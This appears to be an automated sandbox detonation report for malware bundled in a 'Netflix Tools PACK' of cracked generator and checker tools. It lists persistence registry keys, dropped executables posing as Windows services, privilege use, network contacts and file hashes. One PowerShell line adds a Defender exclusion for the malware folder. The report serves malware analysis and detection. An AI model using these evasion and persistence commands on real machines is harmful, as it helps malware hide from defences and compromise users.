| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.121.18.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jhwsafm3.a52.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
Analysis: behavioral29
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:59
Platform
win10v2004-20230621-en
Max time kernel
35s
Max time network
53s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Netflix GC Cracked.to.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Netflix GC Cracked.to.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Netflix GC Cracked.to.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\GC.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\GC.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cracked.to/SpaceXVIII
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xe4,0x104,0x7ff9f65f46f8,0x7ff9f65f4708,0x7ff9f65f4718
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,1853607529233670984,622167129225036164,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,1853607529233670984,622167129225036164,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,1853607529233670984,622167129225036164,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:8
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,1853607529233670984,622167129225036164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,1853607529233670984,622167129225036164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,1853607529233670984,622167129225036164,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 52.168.112.66:443 | | tcp |
| US | 8.8.8.8:53 | 37.146.190.20.in-addr.arpa | udp |
| US | 2.18.121.83:80 | | tcp |
| US | 93.184.221.240:80 | | tcp |
| US | 8.8.8.8:53 | cracked.to | udp |
| GB | 96.16.110.41:443 | | tcp |
| US | 172.67.73.245:443 | cracked.to | tcp |
| US | 172.67.73.245:443 | cracked.to | tcp |
| US | 8.8.8.8:53 | 245.73.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cracked.io | udp |
| US | 172.67.69.246:443 | cracked.io | tcp |
| US | 8.8.8.8:53 | 16.42.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.255.255.239.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.69.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.cracked.io | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 8.8.8.8:53 | 106.208.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.25.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.cracked.to | udp |
| N/A | 224.0.0.251:5353 | | udp |
Files
memory/2204-133-0x0000000000450000-0x0000000000480000-memory.dmp
memory/2204-134-0x0000000004E10000-0x0000000004EAC000-memory.dmp
memory/2204-135-0x0000000005460000-0x0000000005A04000-memory.dmp
memory/2204-136-0x0000000004F50000-0x0000000004FE2000-memory.dmp
memory/2204-137-0x0000000004DF0000-0x0000000004E00000-memory.dmp
memory/2204-138-0x0000000004EC0000-0x0000000004ECA000-memory.dmp
memory/2204-139-0x00000000050E0000-0x0000000005136000-memory.dmp
memory/3284-140-0x0000000000280000-0x0000000000294000-memory.dmp
memory/3284-141-0x0000000004B70000-0x0000000004B80000-memory.dmp
memory/3284-142-0x00000000061F0000-0x000000000626E000-memory.dmp
memory/3284-144-0x0000000004B70000-0x0000000004B80000-memory.dmp
memory/5068-145-0x00000000008B0000-0x0000000000902000-memory.dmp
memory/652-146-0x00000000029F0000-0x0000000002A26000-memory.dmp
memory/652-147-0x0000000005560000-0x0000000005B88000-memory.dmp
memory/5068-148-0x0000000005250000-0x0000000005260000-memory.dmp
memory/652-149-0x0000000004F20000-0x0000000004F30000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_utnfw151.i25.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/652-152-0x0000000005B90000-0x0000000005BB2000-memory.dmp
memory/652-156-0x0000000005C30000-0x0000000005C96000-memory.dmp
memory/652-161-0x0000000005E10000-0x0000000005E76000-memory.dmp
memory/652-162-0x0000000006320000-0x000000000633E000-memory.dmp
memory/5068-163-0x0000000002C00000-0x0000000002C1C000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/3284-185-0x0000000006A00000-0x0000000006A76000-memory.dmp
memory/3284-187-0x00000000069E0000-0x00000000069FE000-memory.dmp
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 09932bc072dfd2591f537c31e7f7c5bc |
| SHA1 | 5992d292629688f3b98db35a6274f9b9ef8baef1 |
| SHA256 | 41de587416d72dd9c2e27745572592deb76b2646b7c6491a6041019662a10c32 |
| SHA512 | 0141ddf09fbef149d342e48c3fc98231a707b9d95f52e65c530e3a7d7f4172a68bd15c270eb44759063b528a938a14ab19c5ff400c6f7092aff793d8a93e1a47 |
memory/3416-207-0x0000000000260000-0x0000000000272000-memory.dmp
\??\pipe\LOCAL\crashpad_4304_TIQXPABYKHLWJYPB
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/652-213-0x0000000004F20000-0x0000000004F30000-memory.dmp
memory/3416-215-0x0000000004BD0000-0x0000000004BE0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
| MD5 | e5e3377341056643b0494b6842c0b544 |
| SHA1 | d53fd8e256ec9d5cef8ef5387872e544a2df9108 |
| SHA256 | e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25 |
| SHA512 | 83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef |
memory/652-223-0x00000000072D0000-0x0000000007302000-memory.dmp
memory/652-224-0x000000006F140000-0x000000006F18C000-memory.dmp
memory/652-235-0x0000000007290000-0x00000000072AE000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
memory/652-239-0x000000007F080000-0x000000007F090000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/2840-242-0x0000000000930000-0x0000000000942000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/652-245-0x0000000007C80000-0x00000000082FA000-memory.dmp
memory/652-246-0x0000000007630000-0x000000000764A000-memory.dmp
memory/2840-248-0x0000000005140000-0x0000000005150000-memory.dmp
memory/652-249-0x00000000076A0000-0x00000000076AA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 218e449501e9bc2755a9758e17de9cde |
| SHA1 | b29d3810fddc119b996275825d0d6b6bfe00129f |
| SHA256 | 6d27f9bfbdbb874d2e62a7e5276ff2405fefb4971374b6b593aaf0e408b15c86 |
| SHA512 | 5d0fa1934bfe03f54332134d07aad59044b05510c38b2ebd98f963867f2efc1e52aaca23e26925b395e7b5a6ae1a0c95c98d51050c909ae6a2d78ddc8f02cf68 |
memory/652-255-0x00000000078B0000-0x0000000007946000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 7f2c89788f5d86c1b5afae06b3087bda |
| SHA1 | ff9443ccd26e98585abf59956b52be839f525139 |
| SHA256 | 26fabf9abceff81111ff2ef1fdc3fa564fba688d6bc83609dc8558b61edb623d |
| SHA512 | 7a30e7f5d6325c1e0abb749dc3692c849e5877de1fb13925fac6664a29596a6a1b857015da0eadc58d5fb9e3d83c91bd2a234be0d96a3ecaef752e0d470d5a96 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 06031cccee6e1ce17966c1b80f33d9ef |
| SHA1 | 8bde290327d41dc22ce2fa24bac69f4e849af953 |
| SHA256 | 3f5e917be6bfc9311f21bd4a8e702938814a3da67c1220db142cc94976fa4c90 |
| SHA512 | 1a8875afb7f567c16a1ea01318bd97a06dcffd7470fb80f154dbdc57487c1a50ab21127e8af433f2fb0b1e753813b24d789a4fdfd9992267ff75ef0b15fc7322 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk
| MD5 | 8460db432a6d863a6846e379064b4def |
| SHA1 | d779f0eec861a9419974ea7e79466b282ca5fb1f |
| SHA256 | 4fe10d06463c8a680c4048dbbec4d127e785ad31a24aeb466309fa1e429cf122 |
| SHA512 | 2003262bb341f823c133e77f0eb3a1d29915da4903cdc18361344051ce28ca171974b4ace46e8644b57db7742b98d59aebf252e70991584640b69dd83570c1c1 |
memory/5068-324-0x0000000005250000-0x0000000005260000-memory.dmp
memory/652-325-0x0000000004F20000-0x0000000004F30000-memory.dmp
memory/652-326-0x0000000004F20000-0x0000000004F30000-memory.dmp
memory/652-333-0x0000000007860000-0x000000000786E000-memory.dmp
memory/652-334-0x0000000007970000-0x000000000798A000-memory.dmp
memory/652-336-0x0000000007950000-0x0000000007958000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 9e0984d5da7cc1d108493c72eaf59519 |
| SHA1 | 6c90837191631ff7526d55d755744112b0d7f903 |
| SHA256 | a9e0e81345947ff98dd455293e3d772a36e9c93637ab8511b730d9ad78bf4712 |
| SHA512 | 17054340ed1e56d6e0b92f2f41e452ef6a254f7a192b0f8c2039a68b27912796160148241166c7c1978311f6a3747c16d9c47cd3647631a5bb5c70e7582ba466 |
memory/3416-373-0x0000000004BD0000-0x0000000004BE0000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
28s
Max time network
31s
Command Line
Signatures
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\GoldFlix Checker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\Launcher.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\460557edf4b4cbfb08eadcebcbd28364.exe | C:\Windows\winconfig.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\460557edf4b4cbfb08eadcebcbd28364.exe | C:\Windows\winconfig.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
| N/A | N/A | C:\Windows\winconfig.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\460557edf4b4cbfb08eadcebcbd28364 = "\"C:\\Windows\\winconfig.exe\" .." | C:\Windows\winconfig.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\460557edf4b4cbfb08eadcebcbd28364 = "\"C:\\Windows\\winconfig.exe\" .." | C:\Windows\winconfig.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\winconfig.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
